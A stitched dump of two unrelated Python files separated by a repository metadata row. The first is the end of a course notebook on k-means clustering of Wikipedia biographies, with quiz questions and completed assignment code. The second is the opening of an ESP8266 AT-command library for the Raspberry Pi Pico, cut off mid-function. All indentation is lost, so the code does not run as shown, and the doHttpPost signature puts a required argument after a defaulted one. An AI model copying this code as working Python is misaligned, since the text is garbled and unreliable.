record_heterogeneity=heterogeneity, verbose=True)
plot_heterogeneity(heterogeneity, k)
# **Quiz Question**. (True/False) The clustering objective (heterogeneity) is non-increasing for this example.
# **Quiz Question**. Let's step back from this particular example. If the clustering objective (heterogeneity) would ever increase when running k-means, that would indicate: (choose one)
#
# 1. k-means algorithm got stuck in a bad local minimum
# 2. There is a bug in the k-means code
# 3. All data points consist of exact duplicates
# 4. Nothing is wrong. The objective should generally go down sooner or later.
# **Quiz Question**. Which of the cluster contains the greatest number of data points in the end? Hint: Use [`np.bincount()`](http://docs.scipy.org/doc/numpy-1.11.0/reference/generated/numpy.bincount.html) to count occurrences of each cluster label.
# 1. Cluster #0
# 2. Cluster #1
# 3. Cluster #2
# In[38]:
np.bincount(cluster_assignment)
# ## Beware of local maxima
# One weakness of k-means is that it tends to get stuck in a local minimum. To see this, let us run k-means multiple times, with different initial centroids created using different random seeds.
#
# **Note:** Again, in practice, you should set different seeds for every run. We give you a list of seeds for this assignment so that everyone gets the same answer.
#
# This may take several minutes to run.
# In[40]:
k = 10
heterogeneity = {}
import time
start = time.time()
for seed in [0, 20000, 40000, 60000, 80000, 100000, 120000]:
initial_centroids = get_initial_centroids(tf_idf, k, seed)
centroids, cluster_assignment = kmeans(tf_idf, k, initial_centroids, maxiter=400,
record_heterogeneity=None, verbose=False)
# To save time, compute heterogeneity only once in the end
heterogeneity[seed] = compute_heterogeneity(tf_idf, k, centroids, cluster_assignment)
# New line for quiz question
print('seed={0:06d}, heterogeneity={1:.5f}, max cluster size={2}'.format(seed, heterogeneity[seed], max(np.bincount(cluster_assignment))))
sys.stdout.flush()
end = time.time()
print(end-start)
# Notice the variation in heterogeneity for different initializations. This indicates that k-means sometimes gets stuck at a bad local minimum.
# **Quiz Question**. Another way to capture the effect of changing initialization is to look at the distribution of cluster assignments. Add a line to the code above to compute the size (# of member data points) of clusters for each run of k-means. Look at the size of the largest cluster (most # of member data points) across multiple runs, with seeds 0, 20000, ..., 120000. How much does this measure vary across the runs? What is the minimum and maximum values this quantity takes?
# One effective way to counter this tendency is to use **k-means++** to provide a smart initialization. This method tries to spread out the initial set of centroids so that they are not too close together. It is known to improve the quality of local optima and lower average runtime.
# In[41]:
def smart_initialize(data, k, seed=None):
'''Use k-means++ to initialize a good set of centroids'''
if seed is not None: # useful for obtaining consistent results
np.random.seed(seed)
centroids = np.zeros((k, data.shape[1]))
# Randomly choose the first centroid.
# Since we have no prior knowledge, choose uniformly at random
idx = np.random.randint(data.shape[0])
centroids[0] = data[idx,:].toarray()
# Compute distances from the first centroid chosen to all the other data points
squared_distances = pairwise_distances(data, centroids[0:1], metric='euclidean').flatten()**2
for i in xrange(1, k):
# Choose the next centroid randomly, so that the probability for each data point to be chosen
# is directly proportional to its squared distance from the nearest centroid.
# Roughtly speaking, a new centroid should be as far as from ohter centroids as possible.
idx = np.random.choice(data.shape[0], 1, p=squared_distances/sum(squared_distances))
centroids[i] = data[idx,:].toarray()
# Now compute distances from the centroids to all data points
squared_distances = np.min(pairwise_distances(data, centroids[0:i+1], metric='euclidean')**2,axis=1)
return centroids
# Let's now rerun k-means with 10 clusters using the same set of seeds, but always using k-means++ to initialize the algorithm.
#
# This may take several minutes to run.
# In[42]:
k = 10
heterogeneity_smart = {}
start = time.time()
for seed in [0, 20000, 40000, 60000, 80000, 100000, 120000]:
initial_centroids = smart_initialize(tf_idf, k, seed)
centroids, cluster_assignment = kmeans(tf_idf, k, initial_centroids, maxiter=400,
record_heterogeneity=None, verbose=False)
# To save time, compute heterogeneity only once in the end
heterogeneity_smart[seed] = compute_heterogeneity(tf_idf, k, centroids, cluster_assignment)
print('seed={0:06d}, heterogeneity={1:.5f}'.format(seed, heterogeneity_smart[seed]))
sys.stdout.flush()
end = time.time()
print(end-start)
# Let's compare the set of cluster heterogeneities we got from our 7 restarts of k-means using random initialization compared to the 7 restarts of k-means using k-means++ as a smart initialization.
#
# The following code produces a [box plot](http://matplotlib.org/api/pyplot_api.html) for each of these methods, indicating the spread of values produced by each method.
# In[43]:
plt.figure(figsize=(8,5))
plt.boxplot([heterogeneity.values(), heterogeneity_smart.values()], vert=False)
plt.yticks([1, 2], ['k-means', 'k-means++'])
plt.rcParams.update({'font.size': 16})
plt.tight_layout()
# A few things to notice from the box plot:
# * On average, k-means++ produces a better clustering than Random initialization.
# * Variation in clustering quality is smaller for k-means++.
# **In general, you should run k-means at least a few times with different initializations and then return the run resulting in the lowest heterogeneity.** Let us write a function that runs k-means multiple times and picks the best run that minimizes heterogeneity. The function accepts an optional list of seed values to be used for the multiple runs; if no such list is provided, the current UTC time is used as seed values.
# In[44]:
def kmeans_multiple_runs(data, k, maxiter, num_runs, seed_list=None, verbose=False):
heterogeneity = {}
min_heterogeneity_achieved = float('inf')
best_seed = None
final_centroids = None
final_cluster_assignment = None
for i in xrange(num_runs):
# Use UTC time if no seeds are provided
if seed_list is not None:
seed = seed_list[i]
np.random.seed(seed)
else:
seed = int(time.time())
np.random.seed(seed)
# Use k-means++ initialization
# YOUR CODE HERE
initial_centroids = smart_initialize(data, k, seed)
# Run k-means
# YOUR CODE HERE
centroids, cluster_assignment = kmeans(data, k, initial_centroids, maxiter, record_heterogeneity=None, verbose=False)
# To save time, compute heterogeneity only once in the end
# YOUR CODE HERE
heterogeneity[seed] = compute_heterogeneity(data, k, centroids, cluster_assignment)
if verbose:
print('seed={0:06d}, heterogeneity={1:.5f}'.format(seed, heterogeneity[seed]))
sys.stdout.flush()
# if current measurement of heterogeneity is lower than previously seen,
# update the minimum record of heterogeneity.
if heterogeneity[seed] < min_heterogeneity_achieved:
min_heterogeneity_achieved = heterogeneity[seed]
best_seed = seed
final_centroids = centroids
final_cluster_assignment = cluster_assignment
# Return the centroids and cluster assignments that minimize heterogeneity.
return final_centroids, final_cluster_assignment
# ## How to choose K
# Since we are measuring the tightness of the clusters, a higher value of K reduces the possible heterogeneity metric by definition. For example, if we have N data points and set K=N clusters, then we could have 0 cluster heterogeneity by setting the N centroids equal to the values of the N data points. (Note: Not all runs for larger K will result in lower heterogeneity than a single run with smaller K due to local optima.) Let's explore this general trend for ourselves by performing the following analysis.
# Use the `kmeans_multiple_runs` function to run k-means with five different values of K. For each K, use k-means++ and multiple runs to pick the best solution. In what follows, we consider K=2,10,25,50,100 and 7 restarts for each setting.
#
# **IMPORTANT: The code block below will take about one hour to finish. We highly suggest that you use the arrays that we have computed for you.**
#
# Side note: In practice, a good implementation of k-means would utilize parallelism to run multiple runs of k-means at once. For an example, see [scikit-learn's KMeans](http://scikit-learn.org/stable/modules/generated/sklearn.cluster.KMeans.html).
# In[ ]:
#def plot_k_vs_heterogeneity(k_values, heterogeneity_values):
# plt.figure(figsize=(7,4))
# plt.plot(k_values, heterogeneity_values, linewidth=4)
# plt.xlabel('K')
# plt.ylabel('Heterogeneity')
# plt.title('K vs. Heterogeneity')
# plt.rcParams.update({'font.size': 16})
# plt.tight_layout()
#start = time.time()
#centroids = {}
#cluster_assignment = {}
#heterogeneity_values = []
#k_list = [2, 10, 25, 50, 100]
#seed_list = [0, 20000, 40000, 60000, 80000, 100000, 120000]
#for k in k_list:
# heterogeneity = []
# centroids[k], cluster_assignment[k] = kmeans_multiple_runs(tf_idf, k, maxiter=400,
# num_runs=len(seed_list),
# seed_list=seed_list,
# verbose=True)
# score = compute_heterogeneity(tf_idf, k, centroids[k], cluster_assignment[k])
# heterogeneity_values.append(score)
#plot_k_vs_heterogeneity(k_list, heterogeneity_values)
#end = time.time()
#print(end-start)
# To use the pre-computed NumPy arrays, first download kmeans-arrays.npz as mentioned in the reading for this assignment and load them with the following code. Make sure the downloaded file is in the same directory as this notebook.
# In[45]:
def plot_k_vs_heterogeneity(k_values, heterogeneity_values):
plt.figure(figsize=(7,4))
plt.plot(k_values, heterogeneity_values, linewidth=4)
plt.xlabel('K')
plt.ylabel('Heterogeneity')
plt.title('K vs. Heterogeneity')
plt.rcParams.update({'font.size': 16})
plt.tight_layout()
filename = 'kmeans-arrays.npz'
heterogeneity_values = []
k_list = [2, 10, 25, 50, 100]
if os.path.exists(filename):
arrays = np.load(filename)
centroids = {}
cluster_assignment = {}
for k in k_list:
print k
sys.stdout.flush()
'''To save memory space, do not load the arrays from the file right away. We use
a technique known as lazy evaluation, where some expressions are not evaluated
until later. Any expression appearing inside a lambda function doesn't get
evaluated until the function is called.
Lazy evaluation is extremely important in memory-constrained setting, such as
an Amazon EC2 t2.micro instance.'''
centroids[k] = lambda k=k: arrays['centroids_{0:d}'.format(k)]
cluster_assignment[k] = lambda k=k: arrays['cluster_assignment_{0:d}'.format(k)]
score = compute_heterogeneity(tf_idf, k, centroids[k](), cluster_assignment[k]())
heterogeneity_values.append(score)
plot_k_vs_heterogeneity(k_list, heterogeneity_values)
else:
print('File not found. Skipping.')
# In the above plot we show that heterogeneity goes down as we increase the number of clusters. Does this mean we should always favor a higher K? **Not at all!** As we will see in the following section, setting K too high may end up separating data points that are actually pretty alike. At the extreme, we can set individual data points to be their own clusters (K=N) and achieve zero heterogeneity, but separating each data point into its own cluster is hardly a desirable outcome. In the following section, we will learn how to detect a K set "too large".
# ## Visualize clusters of documents
# Let's start visualizing some clustering results to see if we think the clustering makes sense. We can use such visualizations to help us assess whether we have set K too large or too small for a given application. Following the theme of this course, we will judge whether the clustering makes sense in the context of document analysis.
#
# What are we looking for in a good clustering of documents?
# * Documents in the same cluster should be similar.
# * Documents from different clusters should be less similar.
#
# So a bad clustering exhibits either of two symptoms:
# * Documents in a cluster have mixed content.
# * Documents with similar content are divided up and put into different clusters.
#
# To help visualize the clustering, we do the following:
# * Fetch nearest neighbors of each centroid from the set of documents assigned to that cluster. We will consider these documents as being representative of the cluster.
# * Print titles and first sentences of those nearest neighbors.
# * Print top 5 words that have highest tf-idf weights in each centroid.
# In[46]:
def visualize_document_clusters(wiki, tf_idf, centroids, cluster_assignment, k, map_index_to_word, display_content=True):
'''wiki: original dataframe
tf_idf: data matrix, sparse matrix format
map_index_to_word: SFrame specifying the mapping betweeen words and column indices
display_content: if True, display 8 nearest neighbors of each centroid'''
print('==========================================================')
# Visualize each cluster c
for c in xrange(k):
# Cluster heading
print('Cluster {0:d} '.format(c)),
# Print top 5 words with largest TF-IDF weights in the cluster
idx = centroids[c].argsort()[::-1]
for i in xrange(5): # Print each word along with the TF-IDF weight
print('{0:s}:{1:.3f}'.format(map_index_to_word['category'][idx[i]], centroids[c,idx[i]])),
print('')
if display_content:
# Compute distances from the centroid to all data points in the cluster,
# and compute nearest neighbors of the centroids within the cluster.
distances = pairwise_distances(tf_idf, centroids[c].reshape(1, -1), metric='euclidean').flatten()
distances[cluster_assignment!=c] = float('inf') # remove non-members from consideration
nearest_neighbors = distances.argsort()
# For 8 nearest neighbors, print the title as well as first 180 characters of text.
# Wrap the text at 80-character mark.
for i in xrange(8):
text = ' '.join(wiki[nearest_neighbors[i]]['text'].split(None, 25)[0:25])
print('\n* {0:50s} {1:.5f}\n {2:s}\n {3:s}'.format(wiki[nearest_neighbors[i]]['name'],
distances[nearest_neighbors[i]], text[:90], text[90:180] if len(text) > 90 else ''))
print('==========================================================')
# Let us first look at the 2 cluster case (K=2).
# In[48]:
'''Notice the extra pairs of parentheses for centroids and cluster_assignment.
The centroid and cluster_assignment are still inside the npz file,
and we need to explicitly indicate when to load them into memory.'''
visualize_document_clusters(wiki, tf_idf, centroids[2](), cluster_assignment[2](), 2, map_index_to_word)
# Both clusters have mixed content, although cluster 1 is much purer than cluster 0:
# * Cluster 0: artists, songwriters, professors, politicians, writers, etc.
# * Cluster 1: baseball players, hockey players, soccer (association football) players, etc.
#
# Top words of cluster 1 are all related to sports, whereas top words of cluster 0 show no clear pattern.
#
# Roughly speaking, the entire dataset was divided into athletes and non-athletes. It would be better if we sub-divided non-atheletes into more categories. So let us use more clusters. How about `K=10`?
# In[49]:
k = 10
visualize_document_clusters(wiki, tf_idf, centroids[k](), cluster_assignment[k](), k, map_index_to_word)
# Clusters 0, 1, and 5 appear to be still mixed, but others are quite consistent in content.
# * Cluster 0: artists, actors, film directors, playwrights
# * Cluster 1: soccer (association football) players, rugby players
# * Cluster 2: track and field athletes
# * Cluster 3: baseball players
# * Cluster 4: professors, researchers, scholars
# * Cluster 5: Austrailian rules football players, American football players
# * Cluster 6: female figures from various fields
# * Cluster 7: composers, songwriters, singers, music producers
# * Cluster 8: ice hockey players
# * Cluster 9: politicians
#
# Clusters are now more pure, but some are qualitatively "bigger" than others. For instance, the category of scholars is more general than the category of baseball players. Increasing the number of clusters may split larger clusters. Another way to look at the size of the clusters is to count the number of articles in each cluster.
# In[50]:
np.bincount(cluster_assignment[10]())
# **Quiz Question**. Which of the 10 clusters above contains the greatest number of articles?
#
# 1. Cluster 0: artists, actors, film directors, playwrights
# 2. Cluster 4: professors, researchers, scholars
# 3. Cluster 5: Austrailian rules football players, American football players
# 4. Cluster 7: composers, songwriters, singers, music producers
# 5. Cluster 9: politicians
# **Quiz Question**. Which of the 10 clusters contains the least number of articles?
#
# 1. Cluster 1: soccer (association football) players, rugby players
# 2. Cluster 3: baseball players
# 3. Cluster 6: female figures from various fields
# 4. Cluster 7: composers, songwriters, singers, music producers
# 5. Cluster 8: ice hockey players
# There appears to be at least some connection between the topical consistency of a cluster and the number of its member data points.
# Let us visualize the case for K=25. For the sake of brevity, we do not print the content of documents. It turns out that the top words with highest TF-IDF weights in each cluster are representative of the cluster.
# In[51]:
visualize_document_clusters(wiki, tf_idf, centroids[25](), cluster_assignment[25](), 25,
map_index_to_word, display_content=False) # turn off text for brevity
# Looking at the representative examples and top words, we classify each cluster as follows. Notice the bolded items, which indicate the appearance of a new theme.
# * Cluster 0: **lawyers, judges, legal scholars**
# * Cluster 1: **professors, researchers, scholars (natural and health sciences)**
# * Cluster 2: ice hockey players
# * Cluster 3: politicans
# * Cluster 4: **government officials**
# * Cluster 5: politicans
# * Cluster 6: **professors, researchers, scholars (social sciences and humanities)**
# * Cluster 7: Canadian politicians
# * Cluster 8: **car racers**
# * Cluster 9: **economists**
# * Cluster 10: track and field athletes
# * Cluster 11: females from various fields
# * Cluster 12: (mixed; no clear theme)
# * Cluster 13: baseball players
# * Cluster 14: **painters, sculptors, artists**
# * Cluster 15: Austrailian rules football players, American football players
# * Cluster 16: **musicians, composers**
# * Cluster 17: soccer (association football) players, rugby players
# * Cluster 18: **poets**
# * Cluster 19: **film directors, playwrights**
# * Cluster 20: **songwriters, singers, music producers**
# * Cluster 21: **generals of U.S. Air Force**
# * Cluster 22: **music directors, conductors**
# * Cluster 23: **basketball players**
# * Cluster 24: **golf players**
#
# Indeed, increasing K achieved the desired effect of breaking up large clusters. Depending on the application, this may or may not be preferable to the K=10 analysis.
#
# Let's take it to the extreme and set K=100. We have a suspicion that this value is too large. Let us look at the top words from each cluster:
# In[53]:
k=100
visualize_document_clusters(wiki, tf_idf, centroids[k](), cluster_assignment[k](), k,
map_index_to_word, display_content=False)
# turn off text for brevity -- turn it on if you are curious ;)
# The class of soccer (association football) players has been broken into two clusters (44 and 45). Same goes for Austrialian rules football players (clusters 26 and 48). The class of baseball players have been also broken into two clusters (16 and 91).
#
# **A high value of K encourages pure clusters, but we cannot keep increasing K. For large enough K, related documents end up going to different clusters.**
#
# That said, the result for K=100 is not entirely bad. After all, it gives us separate clusters for such categories as Brazil, wrestling, computer science and the Mormon Church. If we set K somewhere between 25 and 100, we should be able to avoid breaking up clusters while discovering new ones.
#
# Also, we should ask ourselves how much **granularity** we want in our clustering. If we wanted a rough sketch of Wikipedia, we don't want too detailed clusters. On the other hand, having many clusters can be valuable when we are zooming into a certain part of Wikipedia.
#
# **There is no golden rule for choosing K. It all depends on the particular application and domain we are in.**
#
# Another heuristic people use that does not rely on so much visualization, which can be hard in many applications (including here!) is as follows. Track heterogeneity versus K and look for the "elbow" of the curve where the heterogeneity decrease rapidly before this value of K, but then only gradually for larger values of K. This naturally trades off between trying to minimize heterogeneity, but reduce model complexity. In the heterogeneity versus K plot made above, we did not yet really see a flattening out of the heterogeneity, which might indicate that indeed K=100 is "reasonable" and we only see real overfitting for larger values of K (which are even harder to visualize using the methods we attempted above.)
# **Quiz Question**. Another sign of too large K is having lots of small clusters. Look at the distribution of cluster sizes (by number of member data points). How many of the 100 clusters have fewer than 236 articles, i.e. 0.4% of the dataset?
#
# Hint: Use `cluster_assignment[100]()`, with the extra pair of parentheses for delayed loading.
# In[55]:
temp = cluster_assignment[100]()
count = 0
for i in range(100):
total = (temp == i).sum()
if total < 236:
count += 1
print count
# ### Takeaway
#
# Keep in mind though that tiny clusters aren't necessarily bad. A tiny cluster of documents that really look like each others is definitely preferable to a medium-sized cluster of documents with mixed content. However, having too few articles in a cluster may cause overfitting by reading too much into a limited pool of training data.
| 46.01873 | 725 | 0.707195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 31,869 | 0.720627 |
d316a1c92ea2eacd99036644096b71daf8954435 | 18,504 | py | Python | esp8266.py | mertaksoy/rpi-pico-micropython-esp8266-lib | b6500493294fc37719f6c5494b2ddd0882ac260c | [
"MIT"
] | 8 | 2021-12-30T18:31:26.000Z | 2022-03-22T01:11:29.000Z | esp8266.py | mertaksoy/rpi-pico-micropython-esp8266-lib | b6500493294fc37719f6c5494b2ddd0882ac260c | [
"MIT"
] | 1 | 2021-11-06T22:54:47.000Z | 2021-12-29T03:28:18.000Z | esp8266.py | mertaksoy/rpi-pico-micropython-esp8266-lib | b6500493294fc37719f6c5494b2ddd0882ac260c | [
"MIT"
] | 6 | 2021-09-28T06:35:59.000Z | 2022-01-10T10:36:41.000Z | from machine import UART, Pin
import time
from httpParser import HttpParser
ESP8266_OK_STATUS = "OK\r\n"
ESP8266_ERROR_STATUS = "ERROR\r\n"
ESP8266_FAIL_STATUS = "FAIL\r\n"
ESP8266_WIFI_CONNECTED="WIFI CONNECTED\r\n"
ESP8266_WIFI_GOT_IP_CONNECTED="WIFI GOT IP\r\n"
ESP8266_WIFI_DISCONNECTED="WIFI DISCONNECT\r\n"
ESP8266_WIFI_AP_NOT_PRESENT="WIFI AP NOT FOUND\r\n"
ESP8266_WIFI_AP_WRONG_PWD="WIFI AP WRONG PASSWORD\r\n"
ESP8266_BUSY_STATUS="busy p...\r\n"
UART_Tx_BUFFER_LENGTH = 1024
UART_Rx_BUFFER_LENGTH = 1024*2
class ESP8266:
"""
This is a class for access ESP8266 using AT commands
Using this class, you access WiFi and do HTTP Post/Get operations.
Attributes:
uartPort (int): The Uart port numbet of the RPI Pico's UART BUS [Default UART0]
baudRate (int): UART Baud-Rate for communncating between RPI Pico's & ESP8266 [Default 115200]
txPin (init): RPI Pico's Tx pin [Default Pin 0]
rxPin (init): RPI Pico's Rx pin [Default Pin 1]
"""
__rxData=None
__txData=None
__httpResponse=None
def __init__(self, uartPort=0 ,baudRate=115200, txPin=(0), rxPin=(1)):
"""
The constaructor for ESP8266 class
Parameters:
uartPort (int): The Uart port numbet of the RPI Pico's UART BUS [Default UART0]
baudRate (int): UART Baud-Rate for communncating between RPI Pico's & ESP8266 [Default 115200]
txPin (init): RPI Pico's Tx pin [Default Pin 0]
rxPin (init): RPI Pico's Rx pin [Default Pin 1]
"""
self.__uartPort=uartPort
self.__baudRate=baudRate
self.__txPin=txPin
self.__rxPin=rxPin
#print(self.__uartPort, self.__baudRate, self.__txPin, self.__rxPin)
self.__uartObj = UART(self.__uartPort, baudrate=self.__baudRate, tx=Pin(self.__txPin), rx=Pin(self.__rxPin), txbuf=UART_Tx_BUFFER_LENGTH, rxbuf=UART_Rx_BUFFER_LENGTH)
#print(self.__uartObj)
def _createHTTPParseObj(self):
"""
This is private function for create HTTP response every time
before doing the HTTP Post/Get operation
"""
if(self.__httpResponse != None):
del self.__httpResponse
self.__httpResponse=HttpParser()
else:
#del self.__httpResponse
self.__httpResponse=HttpParser()
def _sendToESP8266(self, atCMD, delay=1):
"""
This is private function for complete ESP8266 AT command Send/Receive operation.
"""
self.__rxData=str()
self.__txData=atCMD
#print("---------------------------"+self.__txData)
self.__uartObj.write(self.__txData)
self.__rxData=bytes()
time.sleep(delay)
#while self.__uartObj.any()>0:
# self.__rxData += self.__uartObj.read(1)
while True:
#print(".")
if self.__uartObj.any()>0:
#print(self.__uartObj.any())
break
while self.__uartObj.any()>0:
self.__rxData += self.__uartObj.read(UART_Rx_BUFFER_LENGTH)
#print(self.__rxData)
if ESP8266_OK_STATUS in self.__rxData:
return self.__rxData
elif ESP8266_ERROR_STATUS in self.__rxData:
return self.__rxData
elif ESP8266_FAIL_STATUS in self.__rxData:
return self.__rxData
elif ESP8266_BUSY_STATUS in self.__rxData:
return "ESP BUSY\r\n"
else:
return None
def startUP(self):
"""
This funtion use to check the communication between ESP8266 & RPI Pico
Return:
True if communication success with the ESP8266
False if unable to communication with the ESP8266
"""
retData = self._sendToESP8266("AT\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
False
def reStart(self):
"""
This funtion use to Reset the ESP8266
Return:
True if Reset successfully done with the ESP8266
False if unable to reset the ESP8266
"""
retData = self._sendToESP8266("AT+RST\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
time.sleep(5)
#self.startUP()
return self.startUP()
else:
return False
else:
False
def echoING(self, enable=False):
"""
This function use to enable/diable AT command echo [Default set as false for diable Echo]
Return:
True if echo off/on command succefully initiate with the ESP8266
False if echo off/on command failed to initiate with the ESP8266
"""
if enable==False:
retData = self._sendToESP8266("ATE0\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
else:
retData = self._sendToESP8266("ATE1\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
def getVersion(self):
"""
This function use to get AT command Version details
Return:
Version details on success else None
"""
retData = self._sendToESP8266("AT+GMR\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
#print(str(retData,"utf-8"))
retData = str(retData).partition(r"OK")[0]
#print(str(retData,"utf-8"))
retData = retData.split(r"\r\n")
retData[0] = retData[0].replace("b'","")
retData=str(retData[0]+"\r\n"+retData[1]+"\r\n"+retData[2])
return retData
else:
return None
else:
return None
def reStore(self):
"""
This function use to reset the ESP8266 into the Factory reset mode & delete previous configurations
Return:
True on ESP8266 restore succesfully
False on failed to restore ESP8266
"""
retData = self._sendToESP8266("AT+RESTORE\r\n")
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return None
"""
def chcekSYSRAM(self):
#retData = self._sendToESP8266("AT+SYSRAM?\r\n")
self.__rxData=b''
self.__txData="AT+SYSRAM?\r\n"
self.__uartObj.write(self.__txData)
self.__rxData=bytes()
time.sleep(2)
while self.__uartObj.any()>0:
self.__rxData += self.__uartObj.read(1)
print(self.__rxData.decode())
if ESP8266_OK_STATUS in self.__rxData:
return self.__rxData
else:
return 1
"""
def getCurrentWiFiMode(self):
"""
This fucntion use to query ESP8266 WiFi's current mode [STA: Station, SoftAP: Software AccessPoint, or Both]
Return:
STA if ESP8266's wifi's current mode pre-config as Station
SoftAP if ESP8266's wifi's current mode pre-config as SoftAP
SoftAP+STA if ESP8266's wifi's current mode set pre-config Station & SoftAP
None failed to detect the wifi's current pre-config mode
"""
retData = self._sendToESP8266("AT+CWMODE_CUR?\r\n")
if(retData != None):
if "1" in retData:
return "STA"
elif "2" in retData:
return "SoftAP"
elif "3" in retData:
return "SoftAP+STA"
else:
return None
else:
return None
def setCurrentWiFiMode(self, mode=3):
"""
This fucntion use to set ESP8266 WiFi's current mode [STA: Station, SoftAP: Software AccessPoint, or Both]
Parameter:
mode (int): ESP8266 WiFi's [ 1: STA, 2: SoftAP, 3: SoftAP+STA(default)]
Return:
True on successfully set the current wifi mode
False on failed set the current wifi mode
"""
txData="AT+CWMODE_CUR="+str(mode)+"\r\n"
retData = self._sendToESP8266(txData)
if(retData!=None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
def getDefaultWiFiMode(self):
"""
This fucntion use to query ESP8266 WiFi's default mode [STA: Station, SoftAP: Software AccessPoint, or Both]
Return:
STA if ESP8266's wifi's default mode pre-config as Station
SoftAP if ESP8266's wifi's default mode pre-config as SoftAP
SoftAP+STA if ESP8266's wifi's default mode set pre-config Station & SoftAP
None failed to detect the wifi's default pre-config mode
"""
retData = self._sendToESP8266("AT+CWMODE_DEF?\r\n")
if(retData!=None):
if "1" in retData:
return "STA"
elif "2" in retData:
return "SoftAP"
elif "3" in retData:
return "SoftAP+STA"
else:
return None
else:
return None
def setDefaultWiFiMode(self, mode=3):
"""
This fucntion use to set ESP8266 WiFi's default mode [STA: Station, SoftAP: Software AccessPoint, or Both]
Parameter:
mode (int): ESP8266 WiFi's [ 1: STA, 2: SoftAP, 3: SoftAP+STA(default)]
Return:
True on successfully set the default wifi mode
False on failed set the default wifi mode
"""
txData="AT+CWMODE_DEF="+str(mode)+"\r\n"
retData = self._sendToESP8266(txData)
if(retData!=None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
def getAvailableAPs(self):
"""
This fucntion use to query ESP8266 for available WiFi AccessPoins
Retuns:
List of Available APs or None
"""
retData = str(self._sendToESP8266("AT+CWLAP\r\n", delay=10))
if(retData != None):
retData = retData.replace("+CWLAP:", "")
retData = retData.replace(r"\r\n\r\nOK\r\n", "")
retData = retData.replace(r"\r\n","@")
retData = retData.replace("b'(","(").replace("'","")
retData = retData.split("@")
retData =list(retData)
apLists=list()
for items in retData:
data=str(items).replace("(","").replace(")","").split(",")
data=tuple(data)
apLists.append(data)
return apLists
else:
return None
def connectWiFi(self,ssid,pwd):
"""
This fucntion use to connect ESP8266 with a WiFi AccessPoins
Parameters:
ssid : WiFi AP's SSID
pwd : WiFi AP's Password
Retuns:
WIFI DISCONNECT when ESP8266 failed connect with target AP's credential
WIFI AP WRONG PASSWORD when ESP8266 tried connect with taget AP with wrong password
WIFI AP NOT FOUND when ESP8266 cann't find the target AP
WIFI CONNECTED when ESP8266 successfully connect with the target AP
"""
txData="AT+CWJAP_CUR="+'"'+ssid+'"'+','+'"'+pwd+'"'+"\r\n"
#print(txData)
retData = self._sendToESP8266(txData, delay=15)
#print(".....")
#print(retData)
if(retData!=None):
if "+CWJAP" in retData:
if "1" in retData:
return ESP8266_WIFI_DISCONNECTED
elif "2" in retData:
return ESP8266_WIFI_AP_WRONG_PWD
elif "3" in retData:
return ESP8266_WIFI_AP_NOT_PRESENT
elif "4" in retData:
return ESP8266_WIFI_DISCONNECTED
else:
return None
elif ESP8266_WIFI_CONNECTED in retData:
if ESP8266_WIFI_GOT_IP_CONNECTED in retData:
return ESP8266_WIFI_CONNECTED
else:
return ESP8266_WIFI_DISCONNECTED
else:
return ESP8266_WIFI_DISCONNECTED
else:
return ESP8266_WIFI_DISCONNECTED
def disconnectWiFi(self):
"""
This fucntion use to disconnect ESP8266 with a connected WiFi AccessPoins
Return:
False on failed to disconnect the WiFi
True on successfully disconnected
"""
retData = self._sendToESP8266("AT+CWQAP\r\n")
if(retData!=None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
return False
def _createTCPConnection(self, link, port=80):
"""
This fucntion use to create connect between ESP8266 and Host.
Just like create a socket before complete the HTTP Get/Post operation.
Return:
False on failed to create a socket connection
True on successfully create and establish a socket connection.
"""
#self._sendToESP8266("AT+CIPMUX=0")
txData="AT+CIPSTART="+'"'+"TCP"+'"'+','+'"'+link+'"'+','+str(port)+"\r\n"
#print(txData)
retData = self._sendToESP8266(txData)
#print(".....")
#print(retData)
if(retData != None):
if ESP8266_OK_STATUS in retData:
return True
else:
return False
else:
False
def doHttpGet(self,host,path,user_agent="RPi-Pico", port=80):
"""
This fucntion use to complete a HTTP Get operation
Parameter:
host (str): Host URL [ex: get operation URL: www.httpbin.org/ip. so, Host URL only "www.httpbin.org"]
path (str): Get operation's URL path [ex: get operation URL: www.httpbin.org/ip. so, the path "/ip"]
user-agent (str): User Agent Name [Default "RPi-Pico"]
post (int): HTTP post number [Default port number 80]
Return:
HTTP error code & HTTP response[If error not equal to 200 then the response is None]
On failed return 0 and None
"""
if(self._createTCPConnection(host, port) == True):
self._createHTTPParseObj()
#getHeader="GET "+path+" HTTP/1.1\r\n"+"Host: "+host+":"+str(port)+"\r\n"+"User-Agent: "+user_agent+"\r\n"+"\r\n";
getHeader="GET "+path+" HTTP/1.1\r\n"+"Host: "+host+"\r\n"+"User-Agent: "+user_agent+"\r\n"+"\r\n";
#print(getHeader,len(getHeader))
txData="AT+CIPSEND="+str(len(getHeader))+"\r\n"
retData = self._sendToESP8266(txData)
if(retData != None):
if ">" in retData:
retData = self._sendToESP8266(getHeader, delay=2)
self._sendToESP8266("AT+CIPCLOSE\r\n")
retData=self.__httpResponse.parseHTTP(retData)
return retData, self.__httpResponse.getHTTPResponse()
else:
return 0, None
else:
return 0, None
else:
self._sendToESP8266("AT+CIPCLOSE\r\n")
return 0, None
def doHttpPost(self,host,path,user_agent="RPi-Pico",content_type,content,port=80):
"""
This fucntion use to complete a HTTP Post operation
Parameter:
host (str): Host URL [ex: get operation URL: www.httpbin.org/ip. so, Host URL only "www.httpbin.org"]
path (str): Get operation's URL path [ex: get operation URL: www.httpbin.org/ip. so, the path "/ip"]
user-agent (str): User Agent Name [Default "RPi-Pico"]
content_type (str): Post operation's upload content type [ex. "application/json", "application/x-www-form-urlencoded", "text/plain"
content (str): Post operation's upload content
post (int): HTTP post number [Default port number 80]
Return:
HTTP error code & HTTP response[If error not equal to 200 then the response is None]
On failed return 0 and None
"""
if(self._createTCPConnection(host, port) == True):
self._createHTTPParseObj()
